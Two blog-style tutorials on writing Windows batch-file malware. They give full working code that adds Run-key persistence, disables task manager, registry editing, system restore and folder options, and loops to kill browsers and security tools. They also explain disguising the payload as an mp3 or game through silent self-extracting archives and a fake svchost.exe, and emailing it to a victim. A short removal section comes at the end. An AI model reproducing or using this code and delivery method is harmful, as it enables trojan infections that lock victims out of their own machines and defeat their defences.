We use the move command to change the wallpaper. The wall paper once set, is converted to a bitmap image and is then moved to the directory–
C:\Documents and settings\”user name”\local settings\application data\Microsoft
But the windows directory may be different drive like D:, E: and even the user name isn’t known. This makes it not suitable to mention a specific path in our code. We use system parameters to identify windows drive and user profile directory. The command– %userprofile% returns the path of the location highlighted in above command. To give path in CMD using system parameters, we need to write path in quotation marks. The command to change wallpaper becomes-
MOVE /y Wallpaper1.bmp “%USERPROFILE%\Local Settings\Application Data\Microsoft”
This copies the wallpaper from current directory to the location where wallpaper is stored.
Note: It is to be kept in mind that windows actually use only uncompressed bitmap images as wallpapers. Whenever we set an image as wallpaper, it is converted to bitmap and then stored at above mentioned location in user profile with name wallpaper1, hence the reason. Thus, the wallpaper we use here should already be a bitmap image, use an image editing tool like Irfanview which does a good job at conversion to bitmap.
Once the wallpaper has been replaced, the system needs to be updated for change to take place on desktop. This is done using the command-
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
After the execution of batch file, it is desired that it isn’t available to host PC that he may open it and view the code, which discloses the location of our batch virus and also the registry key we have added. This is done by simply deleting the files.
Del /F /Q /A:SHR filename
/F forces deletion of read only files, /Q suppresses the confirmation to delete, /A deletes files based on given attributes. S- System, H- Hidden, R- Read only.
Now coming to editing registry, there are two methods of editing a key, first by making a .REG file using batch print tool to write registry keys in a file and later appending them to registry. But this method adds a couple of more lines to our code. Hence we prefer the second method of editing registry directly via command line using REG command.
The syntax to add a key to registry is-
REG ADD main key/v Sub key /t data type /d value /f
The /f parameters enables editing a key without confirmation from user. Our intention is to add a start-up entry in registry such that our code gets executed every time windows logs on. Hence the wallpaper is changed again, making the innocent user panic! The actual key we use is-
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon /t REG_SZ /d %windir%\force.exe /f
The above command writes a start-up key which makes the file pointed by the key run every time windows start. We use %windir% parameter to make sure that no error is encountered in case OS is installed on some other drive.
The point to be noticed here is that the same technique is used by malware to make sure they remain active in memory. The first thing to be done having ended a malicious code execution is to terminate its start-up mechanism. Refer the postEradicate malware.
Similarly to change the start page of internet explorer (tested on IE 6), the registry key is-
REG ADD HKCU\Software\Microsoft\InternetExplorer\Main /v StartPage /t REG_SZ /d http://pcgyaan.wordpress.com /f
Since IE 6 stores the default start page in registry key, it is very vulnerable to this simple attack. I am still working on changing start page of Mozilla Firefox.
Now to add a little more insult to injury, how about tying down our victim’s right arm and make him struggle with his left? We gonna switch the right and left keys of our mouse, making our victim panic even more! Here is the command….
RUNDLL32.exe USER32.DLL,SwapMouseButton
Having learned a few tricks of trade, let’s put down the final batch file code. Open a notepad file and key down this script….
@ECHO OFF
REG ADD HKCU\Software\Microsoft\InternetExplorer\Main /v StartPage /t REG_SZ /d http://pcgyaan.wordpress.com /f
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon /t REG_SZ /d %windir%\force.exe /f
copy /y Wallpaper1.bmp  ”%USERPROFILE%\Local Settings\Application Data\Microsoft”
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
RUNDLL32.exe USER32.DLL,SwapMouseButton
rename song.exe  force.exe
move /y force.exe “%windir%”
del /Q force.bat
del /Q wallpaper.bmp
Save the file and change its extension to .bat. This is the core virus file. Now pick up a photo of our victim and edit it so that it will annoy him the most! This can be simply be done by opening the file in note pad and making it funny or if you how to, edit it in Photoshop. Or sites like photo funaic can be used to spoil the photo. Usually these photos are JPEG format. As mentioned earlier, we need a bitmap image. Convert it to bitmap using an image editing tool, preferably Irfanview since it preserves the quality of photo. Rename this photo to wallpaper1.
It’s quite obvious that nobody will click a suspicious looking batch file, thanks to my previous posts! The second task is to pack our batch file and wallpaper into a single file and change its icon, to mask it, so that user will be compelled to open it. The file can be made to look like a folder, or an mp3 file or a word file or anything. What you need is WinRAR and another software called IconFX.
Install IconFX and run it. In file menu, go to extract icons. Browse for shell32.dll file located in windows\system32 directory and extract and save icon of folder. You can also use the snap tool of iconFX and take snap of files to make an .ico icon file. Here we will name our packed file as song and select icon as an mp3 file icon. Just take snap of mp3 file, preferably windows media player icon. Save the icon at some location.
  1. Install WinRAR on your PC. Select the two files, batch file and bitmap wallpaper by holding Ctrl key, right click and select add to archive option.
  2. In the opened window, click Create SFX archive.
  3. Go to Advanced tab and SFX options in it. In path to extract, select create in current folder. In setup program section, in Run after extract, add name asforce.bat.
  4. In Modes tab, under silent mode section, select hide all.
  5. In update tab, in overwrite section, select overwrite all files.
  6. In text and icon tab, under Customize SFX logo and icon, in Load SFX icon from file, browse and set icon as MP3 icon. Click OK and compress the files. You will get a single .exe file which has an icon of mp3 file. Let’s rename this file as song.
Note: The names force.bat and song.exe must not be changed, since they are referred by those names in batch code.
Now we have a file with name song, having an mp3 icon, quite innocent looking but having really naughty intensions! But the problem here is that if we mail it as it is, either clients like Yahoo doesn’t allow attaching .exe files, also when victim downloads the file, its extension is also shown, exposing our plot. Hence, in case of mailing this virus, compress it to a simple .RAR file and mail it. The victim will extract it, and then see a file with name song and icon of mp3. In curiosity, he will open it and our job is done!!

malware have evolved too. There are new tricks up its sleeves and other surprises that will make you look ahead to the most miserable option – to reinstall your windows. With the sole motive to learn a few more strategies that malware employ to put us into trouble, we make our own malware and see it work. This will develop in us a lot of understanding how malware cause trouble, even preventing antivirus programs to remove them. This will eventually make us skilled enough to catch loop holes in malware that can be exploited to get rid of it, and we do the same at the end of the post. Now, leaving behind our good intensions, let’s put on our masks and enter the darklab!
learning a few DOS and batch basics, which did a little mischief. Well, this time we gonna turn a little more mischievous! The issue with our virus was that it ran a few tasks and later terminated, but this time, we gonna make it run continuously in a cycle, causing little close to what can be called havoc!
This time we will make a virus that will alter registry to start at startup and also place restrictions that will make removing it tough. Like many other malware do- disable system restore, disable registry editing, disable task manager, disable run, and disable folder options as well. In short, a tough one to catch hold of manually! And the virus will remain active in memory, running a process that will monitor your activity and prevent you from running any browser or IM client.
Since we have had discussed how we move around in DOS environment, we will directly speak of motives and how we accomplish them. Our main virus will as usual be a single executable. This file will be a decoy, tempting our victim to open it, posing as a crack or a game. Upon successful execution, this will launch out first batch file that will plant the main virus, another executable file at a secure location and then execute it. Hence, we see how a seemingly legitimate program causes you harm; this is what is called a Trojan horse planter. This launcher can be made to run a legitimate application at the end too, making us less suspicious of what we did in background.
As soon as the virus is planted, it is executed and the second batch file is run, that makes startup entries, apply restrictions and then as planned, runs a loop that will continuously trouble you. The point to be noted here is that the loop can either just carry out the aimed task, which is closing all internet applications in our case, or will carry out the aim and continuously refresh restrictions. In the latter case, unless the malicious process in memory is stopped, registry defaults tools fail to help you; and this is what is happening in newer viruses. It is also important to be mentioned that the registry key responsible for opening the exe files is also being edited by most viruses nowadays, making us helpless since we cant run or install our dependable antivirus. We don’t include this feature in our virus since it crosses the fine line between a prank and a dirty crime.
Thus, you can’t view the virus file, that will be super hidden, nor will you be able to restore registry defaults, which is relaxed in this case fearing avoiding the worst in case you execute the virus yourself…!
Having learned what we are going to do, we head towards code part. Open up a notepad file and key down this code, this will serve as our main batch file.
force.bat code:
@ECHO OFF
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon /t REG_SZ /d %windir%\system32\config\svchost.exe /f
reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore” /v DisableSR /t REG_DWORD /d 1 /f
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
REG add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
:loop
taskkill /F /IM taskmgr.exe /IM procexp.exe /IM firefox.exe /IM chrome.exe /IM iexplore.exe /IM yahoomessenger.exe /IM autoruns.exe
goto loop
After entering the code, go to save as, save this file as force.bat , while keeping save as type as All files. Now, download Bat to exe converter and convert this batch file to an exe file, while keeping options as instructed below:
  1. Set visibility as invisible application.
  2. Set working directory as Temporary directory.
  3. Set temporary files to delete at exit.
In the version information tab, choose an icon file of a DLL and compile the batch file. You will get an exe file that will have icon of a DLL file. Rename this file tosvchost.exe, this name and icon will serve as our decoy. Than change the attributes of this file to hidden,
Now, the virus is ready, we need a planter that will launch the virus on your PC.  For this we code this launch batch file as follows.
Launch.bat code:
@echo off
move /y svchost.exe “%windir%\system32\config\”
start %windir%\system32\config\svchost.exe
start game.exe
exit
Notice that you will need an application that will run after you run the planter, to avoid suspicion. This is a small flash game named “game.exe” in our case. And we choose icon for our launcher as a game icon. If you want it other way, you can choose an mp3 icon, and change the code as –
start song.mp3
And include into launcher a song that will be played once the launcher is executed.
After the file have been coded, name it as launch.bat . Now, we get a small flash game & an icon for it and run bat to exe converter. Choose options as we did in previous case and set the icon file as well. But this time, go to include tab and select add option and add the previously made svchost.exe file and the flash game, renamed to game.exe. Now compile this and of virus is ready.
It is an innocent looking application, claiming to be a flash game, having icon of a game, which is really tempting to try a hand on. Once executed, the contents- The launch.bat, svchost.exe and game.exe are extracted in temp folder and launch.bat is run. As programmed, the launch.bat file will move the main virus svchost.exe to config folder in system32 directory and run it. At the same time, it will run the game that is extracted in temporary folder. This way, the victim sees a game start and doesn’t suspect our Trojan planter. Now our planter has done its job and the main virus is into its place and has been run.
The main virus named as svchost.exe, even if seen through some process monitor tool, looks like a windows application, with icon of a DLL. This virus will anyways disable task manager, so that it can’t be end tasked. It also disables folder options, which prevents victim to search for it since it is super hidden. It also disables run, so that user cant launch applications like group policy editor. It disables registry editing; hence any attempt to import registry will be rejected. And then it goes into a continuous loop that will close Internet explorer, Chrome, Firefox and Yahoo messenger. You can also include other unwanted applications into this list, like process explorer, autoruns tool, malwarebytes etc. Hence, it’s a complete havoc!
Now coming to removing such nasty viruses, it goes by trial and error at first. You try system restore, its disabled, no restore points are available; you try opening task manager, it’s disabled. You try restoring registry defaults, its disabled too. Also process explorer and autoruns fail to start too.
Firstly, since the tools like Process explorer and autoruns can’t be disabled through registry (unless EXE file association is edited, which wont allow you to run any exe file), you will rename them and then run them. Since the virus was monitoring image name and end tasking it, it can’t stop the altered image name. Now, in process explorer, we analyze each of the processes. We notice a suspicious extra svachost.exe, which is running from system32\config folder, which blows its cover. We end task it and delete it. Now running autoruns, we remove its startup registry key as well. Now, the malware is gone, just the alterations in registry remains. Hence, you try cmd. Go to system32 folder and run cmd from there. In cmd, you edit the key which disables registry editing.
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f
This lets you edit registry now. Import the defaults.reg entries and this must fix the rest of the issues. Note that system restore will have to be manually enabled from group policy editor GPEDIT.MSC.
Hence we see that even smarter viruses have loop holes that can be exploited and used to get rid of them.
Note: Booting into safe mode is a favorite option for many, since startup isn’t loaded. But viruses now alter the USERINIT registry key and attach itself to it, hence starting in safe mode too, making the attempt fruitless.